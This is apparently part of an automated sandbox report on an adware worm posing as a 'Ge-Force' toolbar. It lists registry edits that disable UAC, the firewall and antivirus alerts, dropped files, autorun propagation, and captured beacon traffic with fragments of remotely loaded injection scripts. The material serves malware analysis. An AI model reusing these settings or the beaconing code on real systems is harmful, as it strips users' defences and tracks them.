    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
    "EnableLUA" = "0"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "GlobalUserOffline" = "0"

    [HKCU\Software\Aas\695404737]
    "50183847" = "83AD022F944CCF21DDECD41871254667172BA39F3E949513F4CC29B07060AC534912E5BCB155880C2C4326E6FB83E6FA099D4219F6885291D527824C5507229614A07CE2AF035D97263FF7F26AD2ACC9D5D4395D4B8B3109DC5C0C87B31A1505E6E94E08EF20E71B91B96D3856F531DADFD78A894AD6A6C177136C5657B01661"

    [HKCU\Software\Aas]
    "a3_0" = "17001001"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKLM\SOFTWARE\Microsoft\Security Center]
    "AntiVirusOverride" = "1"

    [HKLM\SOFTWARE\Microsoft\Security Center\Svc]
    "UpdatesDisableNotify" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKLM\SOFTWARE\Microsoft\Security Center]
    "FirewallOverride" = "1"

    [HKCU\Software\Aas\695404737]
    "14338242" = "0"
    "7169121" = "144"

    "21507363" = "0"
    "28676484" = "35"

    [HKLM\SOFTWARE\Microsoft\Security Center\Svc]
    "UacDisableNotify" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
    "Hidden" = "2"

    [HKLM\SOFTWARE\Microsoft\Security Center\Svc]
    "FirewallOverride" = "1"

    [HKLM\SOFTWARE\Microsoft\Security Center]
    "FirewallDisableNotify" = "1"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "FE 11 4A 0A 6F 3A B0 B9 41 F5 E0 2F F6 BF 6A BE"

    [HKCU\Software\Aas]
    "a2_0" = "7005"

    [HKLM\SOFTWARE\Microsoft\Security Center\Svc]
    "FirewallDisableNotify" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
    "BaseClass" = "Drive"

    [HKLM\SOFTWARE\Microsoft\Security Center]
    "UpdatesDisableNotify" = "1"

    [HKCU\Software\Aas]
    "a4_0" = "0"

    [HKLM\SOFTWARE\Microsoft\Security Center\Svc]
    "AntiVirusOverride" = "1"

    Adds a rule to the Windows firewall that allows any network activity:

    [HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
    "%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"

    Firewall notifications are disabled:

    [HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
    "DisableNotifications" = "1"

    Antivirus notifications are disabled:

    [HKLM\SOFTWARE\Microsoft\Security Center]
    "AntiVirusDisableNotify" = "1"

    [HKLM\SOFTWARE\Microsoft\Security Center\Svc]
    "AntiVirusDisableNotify" = "1"

    The firewall is disabled:

    [HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
    "EnableFirewall" = "0"

    The process mscorsvw.exe:172 makes changes in the system registry.
    The Worm creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
    "AccumulatedWaitIdleTime" = "1260000"

    The process Ge-Force-bg.exe:2632 makes changes in the system registry.
    The Worm creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "6D 47 B3 F2 5A 84 9B 30 E9 C3 A5 17 05 08 53 FC"

    Dropped PE files

    MD5 File path
    0fb8fdff654dea1444a1733cfb79149d c:\Program Files\Ge-Force\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.exe
    e19b738b235ea40fc075f8627c5472b9 c:\Program Files\Ge-Force\Ge-Force-bg.exe
    11ccef28d3bfd871ab173a7e03f57b04 c:\Program Files\Ge-Force\Ge-Force-bho.dll
    303913dad1bffa0af8c207f29489f336 c:\Program Files\Ge-Force\Ge-Force-buttonutil.dll
    ce4ccca778189fef1de87a66f21ac3e1 c:\Program Files\Ge-Force\Ge-Force-buttonutil.exe
    26461d0b7a6729c1263bc94a65753246 c:\Program Files\Ge-Force\Ge-Force-codedownloader.exe
    e63daa30be43031462b6a86267431b9c c:\Program Files\Ge-Force\Uninstall.exe
    5981f7b76df711e10c552db4ca62ab0a c:\Program Files\Ge-Force\utils.exe

    HOSTS file anomalies

    No changes have been detected.

    Rootkit activity

    No anomalies have been detected.

    Propagation

    A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.

    VersionInfo

    Company Name: Idzcf & co.
    Product Name: Id-Eqhowiozunlmy
    Product Version:
    Legal Copyright: Copyright Vylorzwjeixeou
    Legal Trademarks: Eqhowiozunlmy is a trademark of Kuoyj
    Original Filename:
    Internal Name:
    File Version: 15.4.13.18
    File Description: Teocxdjqh
    Comments: comment on Khtmovq
    Language: Language Neutral

    PE Sections

    Name Virtual Address Virtual Size Raw Size Entropy Section MD5
    .text 4096 34108 34304 4.23004 63bb1ab888510a64d453326c977db871
    .data 40960 144 512 0.831186 28f29d4150b83e7faae233a71c5cab15
    .rdata 45056 9272 9728 3.95241 f652035f54b3a74c89f7bb1cb907d4d2
    .bss 57344 297092 0 0 d41d8cd98f00b204e9800998ecf8427e
    .idata 356352 4868 5120 3.6057 0d5c3df1017a50cd5a6baab82c884d87
    .ndata 364544 770048 8192 0 0829f71740aab1ab98b33eae21dee122
    .rsrc 1134592 69632 69120 5.50093 8fe4bd36b5bf2022d4edfda2dd0e3192

    Dropped from:

    Downloaded by:

    Similar by SSDeep:

    Similar by Lavasoft Polymorphic Checker:

    URLs



    IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

    ET MALWARE Win32/Toolbar.CrossRider.A Checkin

    Traffic

    GET /installer.gif?action=started&app=69129&appver=0&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=6&rnd=1421039409 HTTP/1.1
    Host: stats.newstatsclientcloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: 5YWqA/hbsAT52j7 X ANIhfz8LeZSwbzZennRSNr95qyRT5/GOxJxu15bYYT9dyR
    x-amz-request-id: 0498DAA53AE4D7AA
    Date: Mon, 12 Jan 2015 10:21:19 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Tue, 25 Feb 2014 00:10:53 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;....



    GET /apps.gif?action=update&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039416&lifetime=13&oldappver=9&oldbgver=1&oldpluginsver=5&rnd=4509 HTTP/1.1

    Accept: */*
    Host: stats.newstatsclientcloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: Ua7e9bbvbbCCT1UU bIiJuiUTlKYm66dUzVHP y9fM8Qw6DgdOMqkLlvENZ3CpV4
    x-amz-request-id: 8228922C1C267E83
    Date: Mon, 12 Jan 2015 10:21:25 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Tue, 25 Feb 2014 00:10:44 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;....



    GET /installer.gif?action=finished&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1421039403&procruntime=22&rnd=1421039425 HTTP/1.1

    Host: stats.newstatsclientcloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: A/zmK/7hgaaXBz9PonyEz79wBldwn4ioXtD1LKmI1eMLwSl2i1b3Rd 04pDGV3wy
    x-amz-request-id: 3F5834F5D7454D55
    Date: Mon, 12 Jan 2015 10:21:34 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Tue, 25 Feb 2014 00:10:53 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;....



    GET /apps.gif?action=install&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&installtime=1421039403&lifetime=0&silent=1&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=22&rnd=1421039425 HTTP/1.1

    Host: stats.newstatsclientcloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: A3lVDGbw8R9O/TJq2nlst TkRFytz5dj55QfSuffwiB5lh79oRi5t UHQIFNIM9B
    x-amz-request-id: 3DE7DD4364A2825D
    Date: Mon, 12 Jan 2015 10:21:34 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Tue, 25 Feb 2014 00:10:44 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;..


    GET /monetization.gif?event=4&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 HTTP/1.1
    Host: logs.newstatsclientcloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:33 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1389114507"
    Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
    Cache-Control: max-age=86400
    Content-Length: 35
    Content-Type: image/gif
    X-HW: 1421058093.dop006.ny2.t,1421058093.cds053.ny2.c
    GIF89a.............,...........D..;..


    GET / HTTP/1.1
    Host: ipgeoapi.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:17 GMT
    Connection: keep-alive
    Content-Type: application/json;charset=utf-8
    Content-Length: 39
    Server: thin 1.4.1 codename Chromeo
    Via: 1.1 vegur
    {"country_code":38,"country_name":"CA"}


    GET /plugin/apps/69129/js/na/ie/app_code.js?ver=27&rnd=1521 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:23 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1420713929"
    Last-Modified: Thu, 08 Jan 2015 10:45:29 GMT
    Cache-Control: max-age=651
    Content-Length: 15858
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1421058083.dop002.ny2.t,1421058083.cds044.ny2.c
    ..  /*****************************************************************
    *******************. This is your Page Code. The appAPI.ready() code
    block will be executed on every page load.. For more information plea
    se visit our docs site: hXXp://docs.crossrider.com.*******************
    ******************************************************************/.HO
    ST = "hXXp://wt.iwebar.com";.TOOLBAR_URL = HOST '/js/toolbar.js';..A
    FFILIATE_ID = 'NONE';...appAPI.ready(function($) {.../*..if (appAPI.db
    .get('user_id') === null) {...if (appAPI.db.get('installation') === nu
    ll){....appAPI.db.set('installation', new Date().getTime());....return
    ;...}...else {....if ((new Date().getTime() - appAPI.db.get('installat
    ion')) < 1000 * 60 * 60 * 48){.....//No need to display toolbar...
    hasn't been 2 days yet......return;....} ...}..}*/...console.log("====
    ===> Extension [version: " appAPI.appInfo.version "] loading...
    ");....// Set the affiliate ID. //appAPI.db.set('affiliate_id', AFF
    ILIATE_ID);...// Include the Base64 library..appAPI.resources.includeJ
    S('jquery.base64.js');..appAPI.resources.includeJS('jquery-1.10.2.min.
    js');..appAPI.resources.includeJS('md5.js');..//appAPI.resources.inclu
    deJS('i2v.js');....appAPI.resources.includeJS('jw_whitelist_1.js');..a
    ppAPI.resources.includeJS('jw_whitelist_2.js');..appAPI.dom.addRemoteJ
    S('hXXp://wt.iwebar.com/js/jw_whitelist_3.js');.....var pObj = sendRep
    ort();..../** Custom injections **/..appAPI.resources.includeJS('askco
    m.js');..function customInjections(country) {...try {....// Ask.co

    <<< skipped >>>

    GET /plugin/apps/69129/plugins/na/ie/plugins.json?ver=23&rnd=5437 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:23 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1420713930"
    Last-Modified: Thu, 08 Jan 2015 10:45:30 GMT
    Cache-Control: max-age=652
    Content-Length: 17999
    Content-Type: text/plain; charset=UTF-8
    X-HW: 1421058083.dop002.ny2.t,1421058083.cds051.ny2.c
    {.."plugins_version": 23,.."plugins_list":.    [.      {"id":1,"url":"
    hXXp://js.newstatsdemosrv.com/plugins/mins/1.js","ver":11,"name":"base
    ","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"px":
    false},"targets":[{"run_at":1,"order":10400},{"run_at":2,"order":10400
    }],"enabled":true},{"id":4,"url":"hXXp://js.newstatsdemosrv.com/plugin
    s/javascripts/jquery-1_7_1_min.js","ver":5,"name":"jquery_1_7_1","brow
    sers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"t
    argets":[{"run_at":1,"order":10200},{"run_at":0,"order":100},{"run_at"
    :5,"order":100},{"run_at":2,"order":10200}],"enabled":true},{"id":2,"u
    rl":"hXXp://js.newstatsdemosrv.com/plugins/mins/2.js","ver":2,"name":"
    ie8_fix_1","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv"
    :false,"px":false},"targets":[{"run_at":1,"order":10100},{"run_at":2,"
    order":10100}],"enabled":true},{"id":3,"url":"hXXp://js.newstatsdemosr
    v.com/plugins/mins/3.js","ver":2,"name":"ie8_fix_2","browsers":{"ie":t
    rue,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":
    [{"run_at":1,"order":10300},{"run_at":2,"order":10300}],"enabled":true
    },{"id":28,"url":"hXXp://js.newstatsdemosrv.com/plugins/mins/28.js","v
    er":4,"name":"initializer","browsers":{"ie":true,"ff":true,"ch":true,"
    sf":true,"nv":false,"px":false},"targets":[{"run_at":1,"order":9999999
    99},{"run_at":2,"order":999999999}],"enabled":true},{"id":21,"url":"ht
    tp://js.newstatsdemosrv.com/plugins/mins/21.js","ver":5,"name":"debug"
    ,"browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"p

    <<< skipped >>>

    GET /plugins/mins/356.js?ver=1&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:23 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1418564745"
    Last-Modified: Sun, 14 Dec 2014 13:45:45 GMT
    Cache-Control: max-age=20
    Content-Length: 407
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1421058083.dop002.ny2.t,1421058083.cds012.ny2.c
    appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeo
    f appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.
    monetization.plugins={};}appAPI.internal.monetization.plugins[356]=fun
    ction(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetizati
    on.shouldRunByVertical(356,["pops"])){return;}new (appAPI.internal.mon
    etization.plugins.ICMBaseManager({namespace:"MAN"}))();};
    ....



    GET /plugins/mins/193.js?ver=9&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:24 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1408273131"
    Last-Modified: Sun, 17 Aug 2014 10:58:51 GMT
    Cache-Control: max-age=804
    Content-Length: 867
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1421058084.dop002.ny2.t,1421058084.cds009.ny2.c
    if (typeof setup2 === 'function') { setup2('<<< skipped >>>', 'fhsakzfpmp'); }
    ....



    GET /plugins/mins/288.js?ver=1&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:23 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1404660469"
    Last-Modified: Sun, 06 Jul 2014 15:27:49 GMT
    Cache-Control: max-age=451
    Content-Length: 551
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1421058083.dop002.ny2.t,1421058083.cds004.ny2.c
    if (typeof setup2 === 'function') { setup2('<<< skipped >>>', 'cdweqkofzw'); }
    ..
    ..



    GET /plugins/mins/184.js?ver=11&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:24 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1420026483"
    Last-Modified: Wed, 31 Dec 2014 11:48:03 GMT
    Cache-Control: max-age=205
    Content-Length: 1231
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1421058084.dop002.ny2.t,1421058084.cds013.ny2.c
    if (typeof setup2 === 'function') { setup2('<<< skipped >>>', 'yayzflpgyo'); }..

    <<< skipped >>>

    GET /stats.gif?action=daily&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039418&lifetime=15&rnd=6909 HTTP/1.1
    Accept: */*
    Host: stats.newstatsclientcloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2:  qMg0Euses8OGBO03Gf2RtEI4hB2UE6umJ6UcUQCqMJkI7rL4hUOZpdc3VYKbg/B
    x-amz-request-id: 00E59B0A66C91640
    Date: Mon, 12 Jan 2015 10:21:28 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Tue, 25 Feb 2014 00:10:58 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;..


    GET /plugins/mins/262.js?ver=2&rnd=41 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:24 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1411293488"
    Last-Modified: Sun, 21 Sep 2014 09:58:08 GMT
    Cache-Control: max-age=783
    Content-Length: 1075
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1421058084.dop005.ny2.t,1421058084.cds045.ny2.c
    if (typeof setup2 === 'function') { setup2('<<< skipped >>>', 'dkragwefft'); }
    ....



    GET /plugins/mins/350.js?ver=1&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:23 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1417707239"
    Last-Modified: Thu, 04 Dec 2014 15:33:59 GMT
    Cache-Control: max-age=694
    Content-Length: 1799
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1421058083.dop005.ny2.t,1421058083.cds012.ny2.c
    if (typeof setup2 === 'function') { setup2('

    <<< skipped >>>

    GET /plugins/mins/337.js?ver=1&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:24 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1417094308"
    Last-Modified: Thu, 27 Nov 2014 13:18:28 GMT
    Cache-Control: max-age=675
    Content-Length: 407
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1421058084.dop005.ny2.t,1421058084.cds002.ny2.c
    appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeo
    f appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.
    monetization.plugins={};}appAPI.internal.monetization.plugins[337]=fun
    ction(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetizati
    on.shouldRunByVertical(337,["pops"])){return;}new (appAPI.internal.mon
    etization.plugins.ICMBaseManager({namespace:"TEN"}))();};
    ....



    GET /plugins/mins/91.js?ver=118&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:24 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1421049626"
    Last-Modified: Mon, 12 Jan 2015 08:00:26 GMT
    Cache-Control: max-age=50
    Content-Length: 185222
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1421058084.dop005.ny2.t,1421058084.cds002.ny2.c

    <<< skipped >>>

    GET /monetization.gif?event=3&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 HTTP/1.1
    Host: logs.newstatsclientcloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:18 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1389114507"
    Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
    Cache-Control: max-age=86400
    Content-Length: 35
    Content-Type: image/gif
    X-HW: 1421058078.dop007.ny2.t,1421058078.cds053.ny2.c
    GIF89a.............,...........D..;..


    GET /plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=27&rnd=8405 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsclientcloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:28 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1420713954"
    Last-Modified: Thu, 08 Jan 2015 10:45:54 GMT
    Cache-Control: max-age=895
    Content-Length: 1679
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1421058088.dop005.ny2.t,1421058088.cds005.ny2.c
    <?xml version="1.0" encoding="UTF-8"?>
    <CrAppInfo>
      <Ver>27</Ver>
      <ShortName>Ge-Forces 1.1</ShortName>
      <Description>Ge-Force</Description>
      <PublisherName>iWebar</PublisherName>
      <HomePageLink>NA</HomePageLink>
      <JSLink>hXXp://js.newstatsdemosrv.com/plugin/apps/69129/js/na/ie/app_code.js</JSLink>
      <GroupID>0</GroupID>
      <Domain>NA</Domain>
      <RunInIframe>false</RunInIframe>
      <ThanksURL>NA</ThanksURL>
      <EmailSignature>NA</EmailSignature>
      <SettingsURL>NA</SettingsURL>
      <CertifiedInstall>NA</CertifiedInstall>
      <ExposeSites>NA</ExposeSites>
      <RemoteFBApiURL>NA</RemoteFBApiURL>
      <DisableIE>true</DisableIE>
      <DisableFF>true</DisableFF>
      <EnableSearchIE>false</EnableSearchIE>
      <EnableSearchFF>false</EnableSearchFF>
      <AddressbarIE>NA</AddressbarIE>
      <AddressbarFF>NA</AddressbarFF>
      <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>
      <AddressbarCR>NA</AddressbarCR>
      <NewTabURL>NA</NewTabURL>
      <NewTabEmbed>NA</NewTabEmbed>
      <OpenSearchURL>NA</OpenSearchURL>
      <BackgroundJS>hXXp://js.newstatsdemosrv.com/plugin/apps/69129/bg/na/ie/bg_code.js</BackgroundJS>
      <BackgroundVer>1</BackgroundVer>
      <Manifest>NA</Manifest>
      <ChangePrevious>false

    <<< skipped >>>

    GET /plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=9&rnd=7431 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsclientcloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:23 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1420713954"
    Last-Modified: Thu, 08 Jan 2015 10:45:54 GMT
    Cache-Control: max-age=900
    Content-Length: 1679
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1421058083.dop006.ny2.t,1421058083.cds005.ny2.pr
    <?xml version="1.0" encoding="UTF-8"?>
    <CrAppInfo>
      <Ver>27</Ver>
      <ShortName>Ge-Forces 1.1</ShortName>
      <Description>Ge-Force</Description>
      <PublisherName>iWebar</PublisherName>
      <HomePageLink>NA</HomePageLink>
      <JSLink>hXXp://js.newstatsdemosrv.com/plugin/apps/69129/js/na/ie/app_code.js</JSLink>
      <GroupID>0</GroupID>
      <Domain>NA</Domain>
      <RunInIframe>false</RunInIframe>
      <ThanksURL>NA</ThanksURL>
      <EmailSignature>NA</EmailSignature>
      <SettingsURL>NA</SettingsURL>
      <CertifiedInstall>NA</CertifiedInstall>
      <ExposeSites>NA</ExposeSites>
      <RemoteFBApiURL>NA</RemoteFBApiURL>
      <DisableIE>true</DisableIE>
      <DisableFF>true</DisableFF>
      <EnableSearchIE>false</EnableSearchIE>
      <EnableSearchFF>false</EnableSearchFF>
      <AddressbarIE>NA</AddressbarIE>
      <AddressbarFF>NA</AddressbarFF>
      <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>
      <AddressbarCR>NA</AddressbarCR>
      <NewTabURL>NA</NewTabURL>
